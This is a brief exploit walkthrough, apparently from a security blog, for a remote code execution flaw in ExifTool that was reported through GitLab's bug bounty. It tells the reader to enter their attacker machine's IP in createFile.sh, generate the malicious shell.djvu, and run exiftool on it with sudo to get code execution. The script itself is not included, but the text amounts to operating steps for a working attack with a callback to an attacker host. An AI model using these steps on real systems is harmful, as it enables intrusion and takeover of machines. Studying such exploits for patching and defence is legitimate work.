Recently, the researcher wcbowling found a vulnerability in ExifTool that allows a malicious actor to perform a remote code execution attack. The vulnerability was found through the GitLab bug bounty program; GitLab uses this tool as a dependency of its product.
On line 12 of createFile.sh, put the IP address of your own attacker machine.
Then simply execute:
$ bash createFile.sh
This will create the malicious file shell.djvu. By using exiftool, you can get remote code execution:
$ sudo /usr/local/bin/exiftool shell.djvu